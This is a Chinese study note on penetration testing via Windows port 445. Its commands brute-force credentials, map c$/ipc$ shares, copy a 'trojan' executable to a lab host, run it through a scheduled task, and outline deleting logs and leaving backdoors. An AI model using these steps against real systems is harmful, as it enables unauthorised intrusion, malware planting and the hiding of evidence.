渗透测试(445端口)
笔记
由于太困,文章涉及的软件想要私聊(其实网上都有,想找都能找到)
还有有的软件下载谷歌浏览器权限不足(这个问题我也不知道是不是叫这个)
解决:谷歌里面安装迅雷插件,或者换个浏览器下载或者复制下载连接在迅雷里面下载;
太困了,明天再写吧!1!!!
1.授权
2.信息收集(nslookup whois)
3.扫描漏洞
namp扫描IP 范围 端口 80 {IIS,apache,什么网站,软件 漏洞})scanpot软件扫描;
高级扫描:如IIS漏洞 2003-iis6.0 2008iis7.0
扫描网站漏洞(十大网站漏洞 )
4.漏洞利用
5.提权(shell环境命令控制权,桌面环境,最高权限)
=======删库跑路
6.毁尸灭迹(删除日志)
7.留后门
8.渗透测试报告(漏洞,端口)=》安全加固方案
手工测试端口号开放:
telnet IP地址 测试端口
映射共享文件夹,在本地电脑F盘
net use f: \10.1.1.2\share ROOT /user:administrator
net use f: \10.1.1.2\share /del
md 文件夹(创建文件夹)
w漏洞利用之IPC$:
net use f: \10.1.1.2\share 密码 /user:用户名
net use f: /del
net use * /del
net use f: \10.1.1.2\c$ 密码 /user:用户名
net use f: \10.1.1.2\ipc$ 密码 /user:用户名
暴力破解系统密码之445:
445漏洞利用之一IPC$:
1、scanport 扫描445端口
2、进行暴力破解:NTscan
net use f: \10.1.1.2\ipc$ 密码 /user:用户名
net use f: \10.1.1.2\share 密码 /user:用户
net use * /del
net use * /del
net use f: \10.1.1.2\c$ 密码 /user:用户名
4、制作木马
copy con haha.bat
shutdown -s -t 100
^z
拷贝在f:盘
copy haha.bat f:
5、植入木马(留后门)
copy d:\heihei.exe \10.1.1.2\c$
6、设计计划任务自动执行木马:
net time \10.1,1.2
at \10.1.1.2 11:11 “c:\heihei.exe”
7、等待肉鸡上线
参考文献:
千锋教育(https://www.bilibili.com/video/BV1i7411G7vm)
渗透测试(445端口)相关推荐
- 通过Metasploitable2了解渗透测试基本思路
0×00 前言/什么是Metasploitable2: Metasploitable是一个刻意制造的Linux靶机.此系统可应用于渗透测试,测试安全工具以及实践常见的渗透测试技术.Metasploit ...
- 3.100个渗透测试实战#3(Lampiao)
目录 一.实验环境 二.实验流程 三.实验步骤 (一)信息收集--主机发现 1.查看kali的网卡和IP信息:(网卡名:eht0:IP:192.168.97.129) 2.查看靶机页面: 3.探测特定 ...
- 渗透测试入门15之常见端口安全测试
在渗透测试中,端口扫描是一个非常重要的环节,端口扫描的目的是了解服务器上运行的服务信息,针对不同的端口进行不同的安全测试,本文的主要内容是关于常见端口安全隐患以及测试方法. DNS(53)UDP DN ...
- 渗透测试入门8之端口渗透
渗透测试入门8之端口渗透 端口扫描 1.端口的指纹信息(版本信息) 2.端口所对应运行的服务 3.常见的默认端口号 4.尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 ...
- 《Nmap渗透测试指南》—第6章6.6节源端口欺骗
本节书摘来自异步社区<Nmap渗透测试指南>一书中的第6章6.6节源端口欺骗,作者 商广明,更多章节内容可以访问云栖社区"异步社区"公众号查看. 6.6 源端口欺骗 表 ...
- 渗透测试中常用端口及利用
渗透测试中常用端口及利用 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆 ...
- 渗透测试常见的默认端口
** 在渗透中端口扫描的收集主机那些那些服务很重要,这里收集到一些常见的的服务端口,欢迎补充. ** ## 1.web常用端口 第三方通用组件漏洞: struts thinkphp jboss gan ...
- 渗透测试信息收集之域名信息、子域名信息、IP信息、端口信息
域名信息收集 什么是信息收集 信息收集是指通过各种方式获取所需要的信息,以便我们在后续的渗透过程更好的进行 比如目标站点IP.中间件.脚本语言.端口.邮箱等等.信息收集包含资产收集但不限于资产收集 信 ...
- nmap扫描ipv6端口_web渗透测试系列 之 扫描(3)
Nmap-扫描器之王 今天我们来聊聊被称之为扫描器之王的nmap,一般我们在渗透的时候都会这样说,第一步nmap开路.Nmap是一款网络扫描和主机检测的工具.开源免费的.可用于:主机发现.端口发现或枚 ...
- Kali渗透测试-远程控制:6200端口变成“后门”
Kali渗透测试-远程控制:6200端口变成"后门" 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:M ...
最新文章
- 利用HTML5开发Android
- python 信息加密
- AXURE RP EXTENSION For Chrome
- Jmeter java.lang.OutOfMemoryError: GC overhead limit exceeded
- python 文本相似度_python实现余弦相似度文本比较
- 扩散(洛谷-P1661)
- Nginx——配置负载均衡
- c语言 正整数 几位 逆序,c语言经典例题:正整数求位数and求顺、逆序位数
- Harmony OS — Image图片
- 17. Magento 重写控制器
- java服务端验证框架_SpringBoot服务端数据校验过程详解
- linux安装php7.3
- 024# 关于Adempiere过账日期和会计过账记录的解答
- 手把手教你使用Python做数据分析
- uniapp小程序体验版-白屏现象
- 给自定义Dialog加入保留对话框值的功能
- 1988年图灵奖--伊万·萨瑟兰简介
- python如何对excel批量加密_用python加密excel工作表
- element ui自定义图标
- Bitvise SSH Client 8.32下载